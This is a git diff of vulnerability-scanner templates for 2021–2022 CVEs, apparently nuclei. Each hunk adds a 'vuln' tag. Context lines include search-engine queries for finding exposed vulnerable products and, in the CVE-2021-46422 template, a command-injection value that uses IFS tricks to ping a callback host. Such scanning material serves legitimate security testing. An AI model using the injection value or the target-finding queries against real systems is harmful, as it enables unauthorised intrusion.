41ccca3a5b7..7fc49b6950e 100644 --- a/http/cves/2021/CVE-2021-45232.yaml +++ b/http/cves/2021/CVE-2021-45232.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: apache product: apisix_dashboard - tags: cve2021,cve,apache,unauth,apisix + tags: cve2021,cve,apache,unauth,apisix,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-45380.yaml b/http/cves/2021/CVE-2021-45380.yaml index 0ca04b93098..597e8760ba7 100644 --- a/http/cves/2021/CVE-2021-45380.yaml +++ b/http/cves/2021/CVE-2021-45380.yaml @@ -30,7 +30,7 @@ info: - http.html:"Powerd by AppCMS" - http.html:"powerd by appcms" fofa-query: body="powerd by appcms" - tags: cve2021,cve,appcms,xss + tags: cve2021,cve,appcms,xss,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-45382.yaml b/http/cves/2021/CVE-2021-45382.yaml index b081320b2fc..80f254a1d6b 100644 --- a/http/cves/2021/CVE-2021-45382.yaml +++ b/http/cves/2021/CVE-2021-45382.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: dlink product: dir-820l_firmware - tags: cve2021,cve,dlink,kev,rce,vkev + tags: cve2021,cve,dlink,kev,rce,vkev,vuln variables: string1: "{{to_lower(rand_base(5))}}" string2: "{{to_lower(rand_base(6))}}" diff --git a/http/cves/2021/CVE-2021-45420.yaml b/http/cves/2021/CVE-2021-45420.yaml index 54cc8814cb7..b0cf737a93b 100644 --- a/http/cves/2021/CVE-2021-45420.yaml +++ b/http/cves/2021/CVE-2021-45420.yaml @@ -23,7 +23,7 @@ info: vendor: emerson product: dixell_xweb-500 google-query: inurl:"xweb500.cgi" - tags: cve,cve2021,lfw,iot,dixell,xweb500,edb,fileupload,intrusive,vkev + tags: cve,cve2021,lfw,iot,dixell,xweb500,edb,fileupload,intrusive,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-45422.yaml b/http/cves/2021/CVE-2021-45422.yaml index fef35bb9263..5afcf207163 100644 --- a/http/cves/2021/CVE-2021-45422.yaml +++ b/http/cves/2021/CVE-2021-45422.yaml @@ -37,7 +37,7 @@ info: - body="reprise license manager" - body="reprise license" google-query: inurl:"/goforms/menu" - tags: cve2021,cve,reprise,xss,seclists,reprisesoftware,vkev + tags: cve2021,cve,reprise,xss,seclists,reprisesoftware,vkev,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-45428.yaml b/http/cves/2021/CVE-2021-45428.yaml index 6784432552d..9e19623f51e 100644 --- a/http/cves/2021/CVE-2021-45428.yaml +++ b/http/cves/2021/CVE-2021-45428.yaml @@ -30,7 +30,7 @@ info: vendor: telesquare product: tlr-2005ksh shodan-query: http.html:"TLR-2005KSH" - tags: cve2021,cve,telesquare,intrusive,fileupload,packetstorm + tags: cve2021,cve,telesquare,intrusive,fileupload,packetstorm,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-45793.yaml b/http/cves/2021/CVE-2021-45793.yaml index 552edac4858..031efd393db 100644 --- a/http/cves/2021/CVE-2021-45793.yaml +++ b/http/cves/2021/CVE-2021-45793.yaml @@ -21,7 +21,7 @@ info: max-request: 3 vendor: slims product: senayan_library_management_system - tags: cve2021,cve,slims,sqli + tags: cve2021,cve,slims,sqli,vuln variables: num: "999999999" diff --git a/http/cves/2021/CVE-2021-45811.yaml b/http/cves/2021/CVE-2021-45811.yaml index 01d96d559a6..4dc4aa16c39 100644 --- a/http/cves/2021/CVE-2021-45811.yaml +++ b/http/cves/2021/CVE-2021-45811.yaml @@ -26,7 +26,7 @@ info: shodan-query: title:"osTicket" fofa-query: title="osticket" google-query: intitle:"osticket" - tags: cve,cve2021,osticket,sqli,authenticated + tags: cve,cve2021,osticket,sqli,authenticated,vuln flow: http(1) && http(2) diff --git a/http/cves/2021/CVE-2021-45967.yaml b/http/cves/2021/CVE-2021-45967.yaml index 3a2952b4f50..77d4c223d2e 100644 --- a/http/cves/2021/CVE-2021-45967.yaml +++ b/http/cves/2021/CVE-2021-45967.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: pascom product: cloud_phone_system - tags: cve,cve2021,pascom,ssrf,pascom_cloud_phone_system,vkev + tags: cve,cve2021,pascom,ssrf,pascom_cloud_phone_system,vkev,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-45968.yaml b/http/cves/2021/CVE-2021-45968.yaml index 1c82ff2e5af..1a2ffd990b5 100644 --- a/http/cves/2021/CVE-2021-45968.yaml +++ b/http/cves/2021/CVE-2021-45968.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: jivesoftware product: jive - tags: cve2021,cve,pascom,lfi,jivesoftware + tags: cve2021,cve,pascom,lfi,jivesoftware,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-46005.yaml b/http/cves/2021/CVE-2021-46005.yaml index 92e9e3d3554..4ef89b7bf75 100644 --- a/http/cves/2021/CVE-2021-46005.yaml +++ b/http/cves/2021/CVE-2021-46005.yaml @@ -29,7 +29,7 @@ info: product: car_rental_management_system shodan-query: http.html:"car rental management system" fofa-query: body="car rental management system" - tags: cve2021,cve,sourcecodester,authenticated,edb,xss,intrusive,car_rental_management_system_project + tags: cve2021,cve,sourcecodester,authenticated,edb,xss,intrusive,car_rental_management_system_project,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-46068.yaml b/http/cves/2021/CVE-2021-46068.yaml index 9808f43d681..e9f36d83fb7 100644 --- a/http/cves/2021/CVE-2021-46068.yaml +++ b/http/cves/2021/CVE-2021-46068.yaml @@ -29,7 +29,7 @@ info: max-request: 3 vendor: vehicle_service_management_system_project product: vehicle_service_management_system - tags: cve2021,cve,xss,vms,authenticated,vehicle_service_management_system_project + tags: cve2021,cve,xss,vms,authenticated,vehicle_service_management_system_project,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-46069.yaml b/http/cves/2021/CVE-2021-46069.yaml index 40425868dce..66cef73b7f8 100644 --- a/http/cves/2021/CVE-2021-46069.yaml +++ b/http/cves/2021/CVE-2021-46069.yaml @@ -29,7 +29,7 @@ info: max-request: 3 vendor: vehicle_service_management_system_project product: vehicle_service_management_system - tags: cve,cve2021,xss,vms,authenticated,vehicle_service_management_system_project + tags: cve,cve2021,xss,vms,authenticated,vehicle_service_management_system_project,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-46071.yaml b/http/cves/2021/CVE-2021-46071.yaml index ea852d39c08..0447343bfdc 100644 --- a/http/cves/2021/CVE-2021-46071.yaml +++ b/http/cves/2021/CVE-2021-46071.yaml @@ -29,7 +29,7 @@ info: max-request: 3 vendor: vehicle_service_management_system_project product: vehicle_service_management_system - tags: cve2021,cve,xss,vms,authenticated,vehicle_service_management_system_project + tags: cve2021,cve,xss,vms,authenticated,vehicle_service_management_system_project,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-46072.yaml b/http/cves/2021/CVE-2021-46072.yaml index 0665e902742..fd25c367d18 100644 --- a/http/cves/2021/CVE-2021-46072.yaml +++ b/http/cves/2021/CVE-2021-46072.yaml @@ -29,7 +29,7 @@ info: max-request: 3 vendor: vehicle_service_management_system_project product: vehicle_service_management_system - tags: cve2021,cve,xss,vms,authenticated,vehicle_service_management_system_project + tags: cve2021,cve,xss,vms,authenticated,vehicle_service_management_system_project,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-46073.yaml b/http/cves/2021/CVE-2021-46073.yaml index 2d5f8951463..d0b90b240e1 100644 --- a/http/cves/2021/CVE-2021-46073.yaml +++ b/http/cves/2021/CVE-2021-46073.yaml @@ -29,7 +29,7 @@ info: max-request: 3 vendor: vehicle_service_management_system_project product: vehicle_service_management_system - tags: cve2021,cve,xss,vms,authenticated,vehicle_service_management_system_project + tags: cve2021,cve,xss,vms,authenticated,vehicle_service_management_system_project,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-46104.yaml b/http/cves/2021/CVE-2021-46104.yaml index cd862622d76..217743734af 100644 --- a/http/cves/2021/CVE-2021-46104.yaml +++ b/http/cves/2021/CVE-2021-46104.yaml @@ -22,7 +22,7 @@ info: vendor: webp product: webp_server_go shodan-query: http.html:"Webp" - tags: cve,cve2021,lfi,webp + tags: cve,cve2021,lfi,webp,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-46107.yaml b/http/cves/2021/CVE-2021-46107.yaml index d0fa7a1c810..1b01abbae8f 100644 --- a/http/cves/2021/CVE-2021-46107.yaml +++ b/http/cves/2021/CVE-2021-46107.yaml @@ -36,7 +36,7 @@ info: - title="Ligeo" - title="ligeo" google-query: intitle:"ligeo" - tags: cve2021,cve,ligeo,ssrf,lfr,ligeo-archives + tags: cve2021,cve,ligeo,ssrf,lfr,ligeo-archives,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-46379.yaml b/http/cves/2021/CVE-2021-46379.yaml index 3b44e90f967..53f137864bb 100644 --- a/http/cves/2021/CVE-2021-46379.yaml +++ b/http/cves/2021/CVE-2021-46379.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: dlink product: dir-850l_firmware - tags: cve,cve2021,redirect,dlink,router,vkev + tags: cve,cve2021,redirect,dlink,router,vkev,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-46381.yaml b/http/cves/2021/CVE-2021-46381.yaml index f232ce16c75..937c043c475 100644 --- a/http/cves/2021/CVE-2021-46381.yaml +++ b/http/cves/2021/CVE-2021-46381.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: dlink product: dap-1620 - tags: cve2021,cve,lfi,router,packetstorm,dlink,vkev + tags: cve2021,cve,lfi,router,packetstorm,dlink,vkev,vuln http: - method: POST diff --git a/http/cves/2021/CVE-2021-46387.yaml b/http/cves/2021/CVE-2021-46387.yaml index 73473492702..431db517bd9 100644 --- a/http/cves/2021/CVE-2021-46387.yaml +++ b/http/cves/2021/CVE-2021-46387.yaml @@ -32,7 +32,7 @@ info: - http.title:"zywall2plus" fofa-query: title="zywall2plus" google-query: intitle:"zywall2plus" - tags: cve2021,cve,xss,zyxel,edb + tags: cve2021,cve,xss,zyxel,edb,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-46417.yaml b/http/cves/2021/CVE-2021-46417.yaml index 69431135b4a..550ab4053f9 100644 --- a/http/cves/2021/CVE-2021-46417.yaml +++ b/http/cves/2021/CVE-2021-46417.yaml @@ -33,7 +33,7 @@ info: - http.html:"Franklin Fueling Systems" - http.html:"franklin fueling systems" fofa-query: body="franklin fueling systems" - tags: cve2021,cve,packetstorm,franklinfueling,lfi,vkev + tags: cve2021,cve,packetstorm,franklinfueling,lfi,vkev,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-46418.yaml b/http/cves/2021/CVE-2021-46418.yaml index bde0995d480..9ad3001bf69 100644 --- a/http/cves/2021/CVE-2021-46418.yaml +++ b/http/cves/2021/CVE-2021-46418.yaml @@ -23,7 +23,7 @@ info: vendor: telesquare product: "tlr-2855ks6" fofa-query: "product==\"TELESQUARE-TLR-2855KS6\"" - tags: packetstorm,cve,cve2021,telesquare,intrusive + tags: packetstorm,cve,cve2021,telesquare,intrusive,vuln variables: filename: "{{rand_base(6)}}" diff --git a/http/cves/2021/CVE-2021-46419.yaml b/http/cves/2021/CVE-2021-46419.yaml index d8c457215c5..bbfaa1fc7f2 100644 --- a/http/cves/2021/CVE-2021-46419.yaml +++ b/http/cves/2021/CVE-2021-46419.yaml @@ -30,7 +30,7 @@ info: - title="login to tlr-2855ks6" - product=="telesquare-tlr-2855ks6" google-query: "intitle:\"login to tlr-2855ks6\"" - tags: packetstorm,cve,cve2021,telesquare,intrusive + tags: packetstorm,cve,cve2021,telesquare,intrusive,vuln variables: filename: "{{rand_base(6)}}" diff --git a/http/cves/2021/CVE-2021-46422.yaml b/http/cves/2021/CVE-2021-46422.yaml index 90c51f3ad5b..74599e1802c 100644 --- a/http/cves/2021/CVE-2021-46422.yaml +++ b/http/cves/2021/CVE-2021-46422.yaml @@ -30,7 +30,7 @@ info: vendor: telesquare product: sdt-cs3b1 shodan-query: html:"SDT-CW3B1" - tags: cve2021,cve,packetstorm,telesquare,rce,router,injection,edb,vkev + tags: cve2021,cve,packetstorm,telesquare,rce,router,injection,edb,vkev,vuln variables: cmd: "ping${IFS}-c${IFS}1${IFS}{{interactsh-url}}" diff --git a/http/cves/2021/CVE-2021-46424.yaml b/http/cves/2021/CVE-2021-46424.yaml index be9dde5c6a4..d173bcfbcd3 100644 --- a/http/cves/2021/CVE-2021-46424.yaml +++ b/http/cves/2021/CVE-2021-46424.yaml @@ -32,7 +32,7 @@ info: - http.html:"TLR-2005KSH" - http.html:"tlr-2005ksh" fofa-query: body="tlr-2005ksh" - tags: cve2021,cve,telesquare,intrusive,packetstorm + tags: cve2021,cve,telesquare,intrusive,packetstorm,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-46704.yaml b/http/cves/2021/CVE-2021-46704.yaml index d0e1a56ee80..615817f7ac7 100644 --- a/http/cves/2021/CVE-2021-46704.yaml +++ b/http/cves/2021/CVE-2021-46704.yaml @@ -35,7 +35,7 @@ info: fofa-query: - body="genieacs" - icon_hash=-2098066288 - tags: cve2021,cve,genieacs,rce + tags: cve2021,cve,genieacs,rce,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-0087.yaml b/http/cves/2022/CVE-2022-0087.yaml index 79ee0985be3..b9c447b9939 100644 --- a/http/cves/2022/CVE-2022-0087.yaml +++ b/http/cves/2022/CVE-2022-0087.yaml @@ -25,7 +25,7 @@ info: vendor: keystonejs product: keystone framework: node.js - tags: cve,cve2022,keystone,redirect,xss,node.js,keystonejs + tags: cve,cve2022,keystone,redirect,xss,node.js,keystonejs,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-0140.yaml b/http/cves/2022/CVE-2022-0140.yaml index 09f7421a284..16492944a91 100644 --- a/http/cves/2022/CVE-2022-0140.yaml +++ b/http/cves/2022/CVE-2022-0140.yaml @@ -29,7 +29,7 @@ info: vendor: vfbpro product: visual_form_builder framework: wordpress - tags: cve,cve2022,wpscan,disclosure,wordpress,vfbpro + tags: cve,cve2022,wpscan,disclosure,wordpress,vfbpro,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-0147.yaml b/http/cves/2022/CVE-2022-0147.yaml index cda76a28956..31ccd23e8ab 100644 --- a/http/cves/2022/CVE-2022-0147.yaml +++ b/http/cves/2022/CVE-2022-0147.yaml @@ -30,7 +30,7 @@ info: vendor: cookieinformation product: wp-gdpr-compliance framework: wordpress - tags: cve2022,cve,wordpress,xss,wp,authenticated,wp-plugin,wp-gdpr-compliance,wpscan,cookieinformation + tags: cve2022,cve,wordpress,xss,wp,authenticated,wp-plugin,wp-gdpr-compliance,wpscan,cookieinformation,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-0148.yaml b/http/cves/2022/CVE-2022-0148.yaml index 6398a273cf2..42abad86e3b 100644 --- a/http/cves/2022/CVE-2022-0148.yaml +++ b/http/cves/2022/CVE-2022-0148.yaml @@ -28,7 +28,7 @@ info: vendor: premio product: mystickyelements framework: wordpress - tags: cve,cve2022,xss,wp-plugin,authenticated,wpscan,wordpress,premio + tags: cve,cve2022,xss,wp-plugin,authenticated,wpscan,wordpress,premio,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-0149.yaml b/http/cves/2022/CVE-2022-0149.yaml index 650b9cf1fc2..2e88153b4ac 100644 --- a/http/cves/2022/CVE-2022-0149.yaml +++ b/http/cves/2022/CVE-2022-0149.yaml @@ -28,7 +28,7 @@ info: vendor: visser product: store_exporter_for_woocommerce framework: wordpress - tags: cve,cve2022,wpscan,wordpress,wp-plugin,xss,woocommerce,authenticated,visser + tags: cve,cve2022,wpscan,wordpress,wp-plugin,xss,woocommerce,authenticated,visser,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-0150.yaml b/http/cves/2022/CVE-2022-0150.yaml index 180220f49b0..d38039882c4 100644 --- a/http/cves/2022/CVE-2022-0150.yaml +++ b/http/cves/2022/CVE-2022-0150.yaml @@ -28,7 +28,7 @@ info: vendor: wp_accessibility_helper_project product: wp_accessibility_helper framework: wordpress - tags: cve,cve2022,wordpress,wp-plugin,wp,wpscan,xss,wp_accessibility_helper_project + tags: cve,cve2022,wordpress,wp-plugin,wp,wpscan,xss,wp_accessibility_helper_project,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-0165.yaml b/http/cves/2022/CVE-2022-0165.yaml index 98b004fe576..43510343833 100644 --- a/http/cves/2022/CVE-2022-0165.yaml +++ b/http/cves/2022/CVE-2022-0165.yaml @@ -28,7 +28,7 @@ info: vendor: king-theme product: kingcomposer framework: wordpress - tags: cve,cve2022,wp-plugin,redirect,wordpress,wp,wpscan,king-theme + tags: cve,cve2022,wp-plugin,redirect,wordpress,wp,wpscan,king-theme,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-0169.yaml b/http/cves/2022/CVE-2022-0169.yaml index 172535aaf52..bbf8649bdcf 100644 --- a/http/cves/2022/CVE-2022-0169.yaml +++ b/http/cves/2022/CVE-2022-0169.yaml @@ -31,7 +31,7 @@ info: shodan-query: http.html:/wp-content/plugins/photo-gallery fofa-query: body=/wp-content/plugins/photo-gallery publicwww-query: "/wp-content/plugins/photo-gallery" - tags: cve,cve2022,wpscan,wp,wp-plugin,wordpress,sqli,photo-gallery,10web,vkev + tags: cve,cve2022,wpscan,wp,wp-plugin,wordpress,sqli,photo-gallery,10web,vkev,vuln variables: num: "999999999" diff --git a/http/cves/2022/CVE-2022-0189.yaml b/http/cves/2022/CVE-2022-0189.yaml index cc661b70482..4db00f9b5ef 100644 --- a/http/cves/2022/CVE-2022-0189.yaml +++ b/http/cves/2022/CVE-2022-0189.yaml @@ -28,7 +28,7 @@ info: vendor: wprssaggregator product: wp_rss_aggregator framework: wordpress - tags: cve,cve2022,wpscan,wordpress,xss,wp-plugin,authenticated,wprssaggregator + tags: cve,cve2022,wpscan,wordpress,xss,wp-plugin,authenticated,wprssaggregator,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-0201.yaml b/http/cves/2022/CVE-2022-0201.yaml index f10373de527..1dc7ef11366 100644 --- a/http/cves/2022/CVE-2022-0201.yaml +++ b/http/cves/2022/CVE-2022-0201.yaml @@ -28,7 +28,7 @@ info: vendor: permalink_manager_lite_project product: permalink_manager_lite framework: wordpress - tags: cve,cve2022,wp-plugin,wpscan,xss,wordpress,permalink_manager_lite_project + tags: cve,cve2022,wp-plugin,wpscan,xss,wordpress,permalink_manager_lite_project,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-0206.yaml b/http/cves/2022/CVE-2022-0206.yaml index e15dbbafba7..9afcbb8981d 100644 --- a/http/cves/2022/CVE-2022-0206.yaml +++ b/http/cves/2022/CVE-2022-0206.yaml @@ -28,7 +28,7 @@ info: vendor: newstatpress_project product: newstatpress framework: wordpress - tags: cve,cve2022,xss,wp,authenticated,wordpress,wp-plugin,newstatpress,wpscan,newstatpress_project + tags: cve,cve2022,xss,wp,authenticated,wordpress,wp-plugin,newstatpress,wpscan,newstatpress_project,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-0208.yaml b/http/cves/2022/CVE-2022-0208.yaml index 234ad865a1e..83170bf6391 100644 --- a/http/cves/2022/CVE-2022-0208.yaml +++ b/http/cves/2022/CVE-2022-0208.yaml @@ -28,7 +28,7 @@ info: vendor: mappresspro product: mappress framework: wordpress - tags: cve2022,cve,mappress,xss,wordpress,wp-plugin,wpscan,mappresspro + tags: cve2022,cve,mappress,xss,wordpress,wp-plugin,wpscan,mappresspro,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-0212.yaml b/http/cves/2022/CVE-2022-0212.yaml index 6f67e0b2072..468700c2fde 100644 --- a/http/cves/2022/CVE-2022-0212.yaml +++ b/http/cves/2022/CVE-2022-0212.yaml @@ -28,7 +28,7 @@ info: vendor: 10web product: spidercalendar framework: wordpress - tags: cve2022,cve,xss,wpscan,wordpress,wp-plugin,wp,spider-event-calendar,unauthenticated,10web + tags: cve2022,cve,xss,wpscan,wordpress,wp-plugin,wp,spider-event-calendar,unauthenticated,10web,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-0218.yaml b/http/cves/2022/CVE-2022-0218.yaml index fb083162250..3d06e218ee2 100644 --- a/http/cves/2022/CVE-2022-0218.yaml +++ b/http/cves/2022/CVE-2022-0218.yaml @@ -28,7 +28,7 @@ info: vendor: codemiq product: wordpress_email_template_designer framework: wordpress - tags: cve,cve2022,wordpress,wp-plugin,xss,codemiq,vkev + tags: cve,cve2022,wordpress,wp-plugin,xss,codemiq,vkev,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-0220.yaml b/http/cves/2022/CVE-2022-0220.yaml index 261f585b555..3c43c15249a 100644 --- a/http/cves/2022/CVE-2022-0220.yaml +++ b/http/cves/2022/CVE-2022-0220.yaml @@ -27,7 +27,7 @@ info: vendor: welaunch product: wordpress_gdpr\&ccpa framework: wordpress - tags: cve2022,cve,wpscan,wordpress,wp-plugin,wp,xss,unauth,welaunch + tags: cve2022,cve,wpscan,wordpress,wp-plugin,wp,xss,unauth,welaunch,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-0228.yaml b/http/cves/2022/CVE-2022-0228.yaml index c5ff610675a..757e86e9e91 100644 --- a/http/cves/2022/CVE-2022-0228.yaml +++ b/http/cves/2022/CVE-2022-0228.yaml @@ -29,7 +29,7 @@ info: shodan-query: http.html:/wp-content/plugins/popup-builder/ fofa-query: body=/wp-content/plugins/popup-builder/ publicwww-query: /wp-content/plugins/popup-builder/ - tags: time-based-sqli,cve2022,cve,wordpress,wp-plugin,wp,wpscan,popup-builder,sygnoos,sqli + tags: time-based-sqli,cve2022,cve,wordpress,wp-plugin,wp,wpscan,popup-builder,sygnoos,sqli,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-0234.yaml b/http/cves/2022/CVE-2022-0234.yaml index eaad35ab801..0e338542c06 100644 --- a/http/cves/2022/CVE-2022-0234.yaml +++ b/http/cves/2022/CVE-2022-0234.yaml @@ -31,7 +31,7 @@ info: product: woocs framework: wordpress google-query: inurl:"wp-content/plugins/woocommerce-currency-switcher" - tags: cve2022,cve,wpscan,wordpress,wp-plugin,wp,xss,woocs,pluginus + tags: cve2022,cve,wpscan,wordpress,wp-plugin,wp,xss,woocs,pluginus,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-0250.yaml b/http/cves/2022/CVE-2022-0250.yaml index af77d9f83e6..caeffbb8027 100644 --- a/http/cves/2022/CVE-2022-0250.yaml +++ b/http/cves/2022/CVE-2022-0250.yaml @@ -28,7 +28,7 @@ info: product: redirection_for_contact_form_7 framework: wordpress fofa-query: body="/wp-content/plugins/wpcf7-redirect" - tags: cve,cve2022,wordpress,wp,wp-plugin,wpcf7,contact-form7,xss + tags: cve,cve2022,wordpress,wp,wp-plugin,wpcf7,contact-form7,xss,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-0271.yaml b/http/cves/2022/CVE-2022-0271.yaml index 19cdc6ce8f0..4653638976c 100644 --- a/http/cves/2022/CVE-2022-0271.yaml +++ b/http/cves/2022/CVE-2022-0271.yaml @@ -32,7 +32,7 @@ info: shodan-query: http.html:/wp-content/plugins/learnpress fofa-query: body=/wp-content/plugins/learnpress publicwww-query: /wp-content/plugins/learnpress - tags: cve2022,cve,wp,wp-plugin,wordpress,learnpress,wpscan,xss,thimpress + tags: cve2022,cve,wp,wp-plugin,wordpress,learnpress,wpscan,xss,thimpress,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-0281.yaml b/http/cves/2022/CVE-2022-0281.yaml index d2f5492b429..13d8755218c 100644 --- a/http/cves/2022/CVE-2022-0281.yaml +++ b/http/cves/2022/CVE-2022-0281.yaml @@ -33,7 +33,7 @@ info: fofa-query: - body="microweber" - icon_hash=780351152 - tags: cve,cve2022,microweber,disclosure,huntr + tags: cve,cve2022,microweber,disclosure,huntr,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-0288.yaml b/http/cves/2022/CVE-2022-0288.yaml index 85151be47ea..94beea5411f 100644 --- a/http/cves/2022/CVE-2022-0288.yaml +++ b/http/cves/2022/CVE-2022-0288.yaml @@ -27,7 +27,7 @@ info: vendor: ad_inserter_pro_project product: ad_inserter_pro framework: wordpress - tags: cve,cve2022,wordpress,xss,wpscan,ad_inserter_pro_project,vkev + tags: cve,cve2022,wordpress,xss,wpscan,ad_inserter_pro_project,vkev,vuln http: - method: POST diff --git a/http/cves/2022/CVE-2022-0342.yaml b/http/cves/2022/CVE-2022-0342.yaml index bb9e38bfa0c..477ef33576f 100644 --- a/http/cves/2022/CVE-2022-0342.yaml +++ b/http/cves/2022/CVE-2022-0342.yaml @@ -28,7 +28,7 @@ info: fofa-query: - body="/2FA-access.cgi" && body="zyxel zyxel_style1" - body="/2fa-access.cgi" && body="zyxel zyxel_style1" - tags: cve2022,cve,zyxel,auth-bypass,router,vkev + tags: cve2022,cve,zyxel,auth-bypass,router,vkev,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-0346.yaml b/http/cves/2022/CVE-2022-0346.yaml index 0d999f85964..6531cd1909c 100644 --- a/http/cves/2022/CVE-2022-0346.yaml +++ b/http/cves/2022/CVE-2022-0346.yaml @@ -30,7 +30,7 @@ info: vendor: xmlsitemapgenerator product: xml_sitemap_generator framework: wordpress - tags: cve2022,cve,wpscan,wp,wordpress,wp-plugin,xss,www-xml-sitemap-generator-org,xmlsitemapgenerator,vkev + tags: cve2022,cve,wpscan,wp,wordpress,wp-plugin,xss,www-xml-sitemap-generator-org,xmlsitemapgenerator,vkev,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-0349.yaml b/http/cves/2022/CVE-2022-0349.yaml index f4cc8ed9856..52d2d88bf39 100644 --- a/http/cves/2022/CVE-2022-0349.yaml +++ b/http/cves/2022/CVE-2022-0349.yaml @@ -30,7 +30,7 @@ info: vendor: wpdeveloper product: notificationx framework: wordpress - tags: time-based-sqli,cve,cve2022,wordpress,wp-plugin,wp,sqli,notificationx,wpscan,wpdeveloper + tags: time-based-sqli,cve,cve2022,wordpress,wp-plugin,wp,sqli,notificationx,wpscan,wpdeveloper,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-0378.yaml b/http/cves/2022/CVE-2022-0378.yaml index 05ade089af0..bd2505f3231 100644 --- a/http/cves/2022/CVE-2022-0378.yaml +++ b/http/cves/2022/CVE-2022-0378.yaml @@ -33,7 +33,7 @@ info: fofa-query: - body="microweber" - icon_hash=780351152 - tags: cve2022,cve,microweber,xss,huntr + tags: cve2022,cve,microweber,xss,huntr,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-0381.yaml b/http/cves/2022/CVE-2022-0381.yaml index ead67eb7a28..13d5b971463 100644 --- a/http/cves/2022/CVE-2022-0381.yaml +++ b/http/cves/2022/CVE-2022-0381.yaml @@ -29,7 +29,7 @@ info: vendor: "embed_swagger_project" product: "embed_swagger" framework: wordpress - tags: cve,cve2022,swagger,xss,wordpress,embed_swagger_project + tags: cve,cve2022,swagger,xss,wordpress,embed_swagger_project,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2022/CVE-2022-0412.yaml b/http/cves/2022/CVE-2022-0412.yaml index 8bb490997af..d4e1ef49e8a 100644 --- a/http/cves/2022/CVE-2022-0412.yaml +++ b/http/cves/2022/CVE-2022-0412.yaml @@ -30,7 +30,7 @@ info: vendor: templateinvaders product: ti_woocommerce_wishlist framework: wordpress - tags: time-based-sqli,cve2022,cve,sqli,ti-woocommerce-wishlist,wpscan,woocommerce,wordpress,wp-plugin,wp,templateinvaders + tags: time-based-sqli,cve2022,cve,sqli,ti-woocommerce-wishlist,wpscan,woocommerce,wordpress,wp-plugin,wp,templateinvaders,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-0415.yaml b/http/cves/2022/CVE-2022-0415.yaml index 8ec05d56997..ca42a9fdb12 100644 --- a/http/cves/2022/CVE-2022-0415.yaml +++ b/http/cves/2022/CVE-2022-0415.yaml @@ -33,7 +33,7 @@ info: - http.title:"sign in - gogs" fofa-query: title="sign in - gogs" google-query: intitle:"sign in - gogs" - tags: cve,cve2022,rce,gogs,authenticated,huntr,intrusive + tags: cve,cve2022,rce,gogs,authenticated,huntr,intrusive,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-0422.yaml b/http/cves/2022/CVE-2022-0422.yaml index 963a760ea7d..8093d941021 100644 --- a/http/cves/2022/CVE-2022-0422.yaml +++ b/http/cves/2022/CVE-2022-0422.yaml @@ -29,7 +29,7 @@ info: vendor: videousermanuals product: white_label_cms framework: wordpress - tags: cve2022,cve,wordpress,xss,wp-plugin,wpscan,videousermanuals + tags: cve2022,cve,wordpress,xss,wp-plugin,wpscan,videousermanuals,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-0424.yaml b/http/cves/2022/CVE-2022-0424.yaml index debff7ae615..072864a8498 100644 --- a/http/cves/2022/CVE-2022-0424.yaml +++ b/http/cves/2022/CVE-2022-0424.yaml @@ -27,7 +27,7 @@ info: shodan-query: http.html:/wp-content/plugins/popup-by-supsystic fofa-query: body=/wp-content/plugins/popup-by-supsystic publicwww-query: "/wp-content/plugins/popup-by-supsystic" - tags: wpscan,cve,cve2022,wp,wp-plugin,wordpress,disclosure,popup,supsystic + tags: wpscan,cve,cve2022,wp,wp-plugin,wordpress,disclosure,popup,supsystic,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-0429.yaml b/http/cves/2022/CVE-2022-0429.yaml index 15a801dee6c..0619c110d29 100644 --- a/http/cves/2022/CVE-2022-0429.yaml +++ b/http/cves/2022/CVE-2022-0429.yaml @@ -24,7 +24,7 